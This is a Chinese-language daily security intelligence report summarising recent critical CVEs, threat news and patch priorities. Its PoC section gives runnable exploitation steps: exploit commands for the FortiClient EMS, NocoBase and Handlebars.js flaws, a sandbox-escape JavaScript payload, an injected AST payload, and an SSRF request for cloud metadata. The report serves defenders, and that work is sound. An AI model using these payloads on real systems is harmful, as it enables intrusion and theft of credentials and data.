每日安全情报报告 · 2026-04-07
每日安全情报报告 · 2026-04-07
报告时间:2026年04月07日 08:00
覆盖周期:近48小时(2026-04-05 ~ 2026-04-07)
风险等级说明:🔴 严重(CVSS ≥ 9.0)|🟠 高危(7.0-8.9)|🟡 中危(4.0-6.9)|⭐ 在野利用
一、最新高危漏洞
🔴⭐ CVE-2026-35616 · Fortinet FortiClient EMS 预认证 API 绕过 → RCE
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-35616 |
| CVSS 评分 | 9.1(严重) |
| 漏洞类型 | 不当访问控制 / 预认证 API 绕过 → 特权提升 → RCE |
| 受影响组件 | Fortinet FortiClient EMS 7.4.5 ~ 7.4.6 |
| 状态 | ✅ 紧急热补丁已发布 | ⭐ 已在野利用 | CISA KEV(2026-04-06 收录) |
漏洞描述:FortiClient Enterprise Management Server(EMS)中存在不当访问控制漏洞,未经身份验证的攻击者可通过构造特制请求绕过 API 认证机制,在无 Cookie、令牌或凭证的情况下,对 EMS 服务器(以 SYSTEM 权限)及所有受管 FortiClient 终端节点批量执行任意命令。Fortinet 确认该漏洞已被在野利用,CISA 于 2026-04-06 将其加入 KEV 目录,要求联邦机构限期修复。公开 PoC 已出现于 GitHub。
受影响范围:企业级端点管理平台,受管终端可被批量植入恶意载荷,影响面极广。
修复建议:立即升级至 Fortinet 发布的紧急热补丁版本,暂时无法升级的应限制 EMS 服务器的网络访问。
📌 参考资料:
- NVD 详情
- Fortinet 安全公告
- Tenable 分析报告
- The Hacker News 报道
- BleepingComputer 报道
🔴 CVE-2026-34156 · NocoBase 工作流脚本沙箱逃逸 → Root RCE
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-34156 |
| CVSS 评分 | 9.9(严重) |
| 漏洞类型 | Node.js VM 沙箱逃逸 → 远程代码执行(Root 权限) |
| 受影响组件 | NocoBase < 2.0.28(低代码平台) |
| 状态 | 补丁已发布 | PoC 已公开 |
漏洞描述:NocoBase 工作流(Workflow)的 Script Node 在 Node.js vm 沙箱中执行用户提供的 JavaScript 时,向沙箱传入的 console 对象暴露了宿主域(host-realm)的 Function 构造函数。经过身份验证的攻击者可利用此构造函数逃逸出 vm 沙箱,以 NocoBase 服务进程(通常为 root)权限实现任意远程代码执行。该漏洞于 2026-03-31 首次披露,CVSS 评分高达 9.9(部分来源标注为 10.0),属最高危级别。
修复建议:立即升级至 NocoBase 2.0.28 或更高版本,升级前禁用工作流脚本节点功能。
📌 参考资料:
- NVD 详情
- OpenCVE 漏洞详情
- 漏洞深度分析(vuink.com)
- GitHub PoC(0xBlackash)
🔴 CVE-2026-33937 · Handlebars.js AST 注入 → RCE
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-33937 |
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | 模板引擎 AST 注入 → 服务端远程代码执行 |
| 受影响组件 | Handlebars.js(所有受影响版本,广泛用于 Node.js 生态) |
| 状态 | 补丁已发布 | PoC 已公开 |
漏洞描述:Handlebars.js 的 Handlebars.compile() 函数在处理预解析的抽象语法树(AST)对象时,对 NumberLiteral 节点的 value 字段未进行充分清理或转义,导致攻击者可注入恶意 AST 结构实现服务端任意代码执行(RCE)。该漏洞于 2026-03-28 披露。Handlebars.js 广泛用于 Express、HBS 等 Node.js Web 框架,影响面极大。
修复建议:升级至最新版 Handlebars.js,所有接受用户输入作为 AST 的应用须立即审查代码。
📌 参考资料:
- NVD 详情
- justappsec 分析文章
- Wiz 漏洞数据库
- GitHub PoC(dinhvaren)
🔴 CVE-2026-33032 · Nginx UI MCP 端点未授权访问 → 完全接管
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-33032 |
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | 认证缺失 → 未授权访问管理接口 → Nginx 服务完全接管 |
| 受影响组件 | Nginx UI ≤ 2.3.5 |
| 状态 | PoC 已公开 |
漏洞描述:Nginx UI 的 Model Context Protocol(MCP)集成中的 /mcp_message 端点存在认证缺失漏洞,未经身份验证的远程攻击者可直接调用管理工具接口,完全接管 Nginx 服务配置及运行。这是继 CVE-2026-33026(备份恢复加密缺陷)之后,Nginx UI 近期披露的第二个高危漏洞,该项目安全性存在系统性问题。
修复建议:立即更新 Nginx UI 至最新版本,若暂时无法升级,应通过防火墙屏蔽 /mcp_message 端点的外部访问。
📌 参考资料:
- NVD 详情
- GitHub PoC 扫描工具(Twinson333)
🔴 CVE-2026-1868 · GitLab AI Gateway 模板注入 → RCE / DoS
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-1868 |
| CVSS 评分 | 9.9(严重) |
| 漏洞类型 | 模板注入(Duo Workflow Service) → DoS 或 RCE |
| 受影响组件 | GitLab AI Gateway 18.1.6、18.2.6、18.3.1~18.6.1、18.7.0、18.8.0 |
| 状态 | 补丁已发布 | 影响自托管 AI Gateway 用户 |
漏洞描述:GitLab Duo Self-Hosted AI Gateway 的 DuoWorkflowService 组件在处理用户提供的 Agent Platform Flow 定义时,存在模板注入漏洞。攻击者可通过构造特制的 Duo Agent Platform Flow 定义,使服务崩溃(DoS)或在最坏情况下实现对 Gateway 服务器的远程代码执行。该漏洞发生在"AI 驱动开发工具"链内部,攻击路径更为隐蔽,对企业 DevOps 流程构成重大威胁。
修复建议:立即升级受影响的 GitLab AI Gateway 版本,未升级前可暂时禁用 Duo Workflow 功能。
📌 参考资料:
- FreeBuf 报道
- 阿里云 AVD 漏洞库
- GitLab 安全公告
🟠 CVE-2026-20104 · Cisco IOS XE Bootloader 代码执行
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-20104 |
| CVSS 评分 | 7.8(高危) |
| 漏洞类型 | Bootloader 代码执行(绕过 Cisco 签名镜像要求) |
| 受影响组件 | Cisco IOS XE(Catalyst 9200/ESS9300/IE9310 系列交换机) |
| 状态 | 补丁已发布(2026-03-25 披露) |
漏洞描述:Cisco IOS XE 软件的 Bootloader 存在不足验证漏洞,本地已认证攻击者可执行代码以绕过 Cisco 签名镜像要求,在设备启动阶段加载未签名的恶意固件。成功利用可导致设备被持久化后门控制。该漏洞影响企业网络骨干交换机设备,一旦被 APT 组织利用,危害极为严重。
修复建议:按照 Cisco 安全公告要求升级对应固件版本,加强设备物理访问控制。
📌 参考资料:
- NVD 详情
- SentinelOne 漏洞数据库
- CVEDetails
🔴 Android 2026年4月安全公告 · 38 个漏洞(含严重 RCE)
| 字段 | 详情 |
|---|---|
| 发布时间 | 2026-04-06 |
| 修复漏洞数 | 38 个(含严重、高危) |
| 状态 | 安全补丁级别 2026-04-05 修复全部问题 |
重点漏洞:
- CVE-2026-0123:蓝牙栈远程代码执行漏洞(严重级别),可通过蓝牙无交互触发
- CVE-2026-0145:框架服务权限提升漏洞(高危),本地应用可获取 SYSTEM 权限
- CVE-2026-0167:媒体框架信息泄露漏洞(高危),可窃取敏感媒体数据
此外,本次公告还修复了高通(Qualcomm)和联发科(MediaTek)芯片组的多个内核级漏洞。
修复建议:督促设备厂商及时推送更新,用户立即安装安全补丁(2026-04-05 级别)。
📌 参考资料:
- Android 安全公告官方页面
- 安全补丁汇总报道
二、最新漏洞 PoC
PoC #1:CVE-2026-35616 · Fortinet FortiClient EMS 预认证 RCE
PoC 来源:GitHub - z3r0h3ro/CVE-2026-35616-poc
危险等级:🔴 严重(CVSS 9.1,已在野利用)
PoC 状态:已公开,可直接利用
利用步骤
# 1. 克隆 PoC 仓库
git clone https://github.com/z3r0h3ro/CVE-2026-35616-poc.git
cd CVE-2026-35616-poc
# 2. 安装依赖
pip3 install -r requirements.txt
# 依赖:requests, pyyaml, argparse
# 3. 基本利用:在 EMS 服务器上执行命令(无需认证)
python3 exploit.py -t https://target-ems.example.com:8443 -c "whoami"
# 4. 检查 EMS 版本(通过认证绕过)
python3 exploit.py -t https://target:8443 -c "powershell -c \"Get-ItemProperty 'HKLM:\\SOFTWARE\\Fortinet\\FortiClientEMS' | Select Version\""
# 5. 向所有受管终端批量部署命令
python3 exploit.py -t https://target:8443 --deploy-all -c "payload_command"
⚠️ 警告:此 PoC 影响 FortiClient EMS 7.4.5~7.4.6,攻击者无需任何凭证即可对服务器及所有受管终端执行任意命令。仅供授权渗透测试使用,严禁用于非法攻击。
📌 相关资料:
- GitHub PoC 仓库
- 漏洞技术分析(Horizon3.ai)
- Qualys 威胁防护报告
PoC #2:CVE-2026-34156 · NocoBase 工作流沙箱逃逸 → Root RCE
PoC 来源:GitHub - 0xBlackash/CVE-2026-34156
危险等级:🔴 严重(CVSS 9.9/10.0)
PoC 状态:已公开
利用步骤
# 1. 克隆 PoC 仓库
git clone https://github.com/0xBlackash/CVE-2026-34156.git
cd CVE-2026-34156
# 2. 安装依赖
pip3 install -r requirements.txt
# 3. 利用原理:在工作流脚本节点中注入逃逸代码
# 攻击者通过 console 对象访问宿主域 Function 构造函数
# 示例恶意 payload(在 NocoBase 工作流脚本节点中执行):
# const escape = this.constructor.constructor;
# const rce = escape('return process')();
# rce.mainModule.require('child_process').execSync('id > /tmp/pwned');
# 4. 运行自动化利用脚本
python3 exploit.py --target https://nocobase.target.com \
--username attacker@example.com \
--password password123 \
--command "id"
⚠️ 警告:需要一个有权访问工作流功能的已认证账户。受影响版本:NocoBase < 2.0.28,请立即升级。
📌 相关资料:
- GitHub PoC 仓库
- NVD 详情
- OpenCVE 分析
PoC #3:CVE-2026-33937 · Handlebars.js AST 注入 RCE
PoC 来源:GitHub - dinhvaren/cve-2026-33937
危险等级:🔴 严重(CVSS 9.8)
PoC 状态:已公开,影响广泛 Node.js 生态
利用步骤
# 1. 克隆 PoC 仓库
git clone https://github.com/dinhvaren/cve-2026-33937.git
cd cve-2026-33937
# 2. 安装依赖
npm install
# 或者
pip3 install -r requirements.txt # 如有 Python 版本
# 3. 漏洞原理演示
# 通过注入恶意 NumberLiteral AST 节点触发代码执行
# 示例恶意 AST payload:
# {
# "type": "Program",
# "body": [{
# "type": "NumberLiteral",
# "value": "1; require('child_process').execSync('id')"
# }]
# }
# 4. 运行验证脚本
node poc.js --target http://vulnerable-app.example.com \
--endpoint /api/render-template
⚠️ 警告:该漏洞影响所有接受 AST 对象输入的 Handlebars.js 应用,建议立即升级并审查所有使用
Handlebars.compile()处理外部输入的代码路径。
📌 相关资料:
- GitHub PoC 仓库
- NVD 详情
- justappsec 技术分析
PoC #4:CVE-2026-33340 · LoLLMs WEBUI 未授权 SSRF
PoC 来源:GitHub - regaan/CVE-2026-33340
危险等级:🔴 严重(CVSS 9.1)
PoC 状态:已公开
利用步骤
# 1. 克隆 PoC 仓库
git clone https://github.com/regaan/CVE-2026-33340.git
cd CVE-2026-33340
# 2. 安装依赖
pip3 install requests
# 3. 利用 /api/proxy 端点进行 SSRF
# 无需认证,直接向目标 LoLLMs WEBUI 发送请求
curl -X POST http://target-lollms:9600/api/proxy \
-H "Content-Type: application/json" \
-d '{"url": "http://169.254.169.254/latest/meta-data/"}'
# 可用于获取 AWS 元数据、内网扫描等
# 4. 运行自动化脚本
python3 exploit.py --target http://target-lollms:9600 \
--internal-target http://192.168.1.1/admin
⚠️ 警告:LoLLMs 是流行的本地 AI 运行平台,若暴露于公网则极易被利用进行内网渗透或云元数据窃取。
📌 相关资料:
- GitHub PoC 仓库
- PoC Week 2026-04-06 汇总
三、网络安全最新文章
📰 文章1:微软披露 Storm-1175 利用零日漏洞部署 Medusa 勒索软件
来源:Microsoft Security Blog / BleepingComputer
发布时间:2026-04-06
风险等级:🔴 严重威胁
摘要:微软威胁情报团队于 2026-04-06 披露,中国背景的勒索软件附属组织 Storm-1175 正在开展高强度的 Medusa 勒索软件攻击活动,其作案手法中结合使用零日漏洞和近期披露的 N-day 漏洞获取初始访问权限。攻击目标主要集中在医疗、金融、教育、专业服务和政府机构等关键行业,攻击前会进行数月的侦察。Medusa 勒索软件采用高级加密算法和反分析技术,并具有专门利用零日漏洞的自定义投递机制。Storm-1175 内部结构类似正规软件公司,拥有专职的漏洞研究、利用开发、载荷创建和受害者谈判团队,使其能够快速扩大攻击规模。
📌 微软安全博客原文 | BleepingComputer 报道 | WindowsReport 分析
📰 文章2:ShinyHunters 声称窃取 Cisco 300万条 Salesforce 记录并发出公开勒索
来源:CyberNews / CyberSecurityNews / BleepingComputer
发布时间:2026-04-02 ~ 04-06
风险等级:🟠 高危
摘要:知名黑客勒索组织 ShinyHunters 声称对 Cisco Systems 实施了三次独立入侵,盗取超过 300 万条 Salesforce CRM 记录(含个人数据)、Salesforce Aura(Experience Cloud)数据以及 AWS 存储桶内容和 GitHub 仓库代码。该组织于 2026-03-31 更新公告,设定公开泄露截止日期,向 Cisco 施压。此次事件若属实,将是 Cisco 遭遇的最大规模数据泄露之一,同时也再次暴露了大型科技企业云服务(SaaS + IaaS)的安全防护短板。Cisco 尚未发表官方回应。
📌 CyberNews 报道 | CyberSecurityNews 分析 | InfoSecBulletin 详情
📰 文章3:PoC Week 2026-04-06:本周最热门高危 CVE 利用代码汇总
来源:tonyharris.io / 多个安全通讯
发布时间:2026-04-06
风险等级:综合参考
摘要:本周(2026-03-31 ~ 2026-04-06)公开 PoC 的高危 CVE 集中在 Web 应用框架(NocoBase、Handlebars、Spring AI)、运维工具(Trivy、Nginx UI)和基础设施组件(NetScaler、Grafana、Chrome)等方向。漏洞类型涵盖代码注入、沙箱逃逸、供应链攻击和 SSRF,多个 CVE 的 CVSS 评分达 9.8 ~ 9.9,其中 CVE-2026-34156(NocoBase 沙箱逃逸)在部分来源中被评为 CVSS 10.0 满分。安全团队应重点关注 AI/LLM 类工具(NocoBase、LoLLMs)的沙箱安全隔离问题。
📰 文章4:Fortinet FortiClient EMS CVE-2026-35616:从0到 RCE 的完整攻击链分析
来源:Tenable / Horizon3.ai / DarkWebInformer
发布时间:2026-04-05 ~ 04-07
风险等级:🔴 严重
摘要:多家安全公司相继发布了对 CVE-2026-35616 的深度技术分析。Tenable 指出该漏洞是自 CVE-2024-47575 以来 Fortinet 产品最严重的一次公开漏洞,Fortinet 系列产品的在野利用历史悠久,攻击者具备较强的利用能力。Horizon3.ai 客户可通过客户门户运行快速响应测试验证自身是否受影响。Fortinet 已紧急发布热补丁,CISA 要求联邦机构于 2026-04-27 前完成修复。Qualys TruRisk 评分(QVS)将该漏洞评为极高风险。
📌 Tenable 博客分析 | Horizon3.ai 研究报告 | Qualys 威胁防护 | DarkWebInformer 报道
📰 文章5:Zscaler ThreatLabz:2026年3月供应链攻击激增,Axios 和 LiteLLM 被植入 RAT
来源:Zscaler ThreatLabz
发布时间:2026-04-03
风险等级:🟠 高危
摘要:Zscaler ThreatLabz 发布 2026 年 3 月供应链攻击专项报告,重点披露了针对 Axios(npm 库,每周下载量超 1 亿次)和 LiteLLM(AI 框架)的两起重大供应链投毒事件。攻击者植入远程访问木马(RAT),能够实现凭证窃取、横向移动和长期持久化。报告认为,AI 开发生态的快速扩张带来了新的供应链风险,开发者对 npm/PyPI 包的更新通常缺乏严格审查,使攻击者得以长期潜伏。建议企业对所有第三方依赖实施软件供应链完整性验证(如 SLSA 框架)。
📰 文章6:2026年4月 Android 安全公告发布:修复 38 个漏洞含蓝牙 RCE
来源:Google Android Security / TheCustomRom
发布时间:2026-04-06
风险等级:🟠 高危
摘要:Google 于 2026-04-06 正式发布 2026 年 4 月 Android 安全公告,共修复 38 个安全漏洞,涵盖 Android 框架、内核及高通/联发科芯片组组件。其中最严重的 CVE-2026-0123(蓝牙栈 RCE,严重级别)可允许攻击者通过蓝牙在无需用户交互的情况下实现远程代码执行。CVE-2026-0145(框架权限提升)和 CVE-2026-0167(媒体框架信息泄露)被评为高危。安全补丁级别需达到 2026-04-05 才能修复全部漏洞。
四、风险摘要与修复优先级
| 优先级 | CVE / 事件 | 风险描述 | 建议行动 |
|---|---|---|---|
| P0 🔴⭐ | CVE-2026-35616 | FortiClient EMS 在野 RCE,CISA KEV | 立即安装紧急热补丁 |
| P0 🔴 | CVE-2026-34156 | NocoBase CVSS 9.9/10.0 沙箱逃逸 RCE | 立即升级至 2.0.28+ |
| P0 🔴 | CVE-2026-33937 | Handlebars.js AST 注入 CVSS 9.8 RCE | 立即升级 + 代码审查 |
| P1 🔴 | CVE-2026-1868 | GitLab AI Gateway 模板注入 CVSS 9.9 | 本周内升级 GitLab |
| P1 🔴 | Android 4月公告 | 蓝牙 RCE + 38 个漏洞 | 本周内推送安全补丁 |
| P2 🟠 | CVE-2026-20104 | Cisco IOS XE Bootloader RCE | 本周内升级固件 |
| P2 🟠 | ShinyHunters-Cisco | 300万 Salesforce 记录疑泄露 | 排查 Salesforce/AWS 日志 |
| 情报 📊 | Storm-1175 / Medusa | 中国背景勒索软件 + 零日利用 | 加强 EDR + 网络分段 |
报告生成时间:2026-04-07 08:00 UTC+8
数据来源:NVD、CISA KEV、The Hacker News、BleepingComputer、GitHub、Tenable、Qualys、Zscaler ThreatLabz、微软安全博客
部分内容由 AI 辅助生成,建议结合官方公告进行二次核实
AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。
更多推荐


所有评论(0)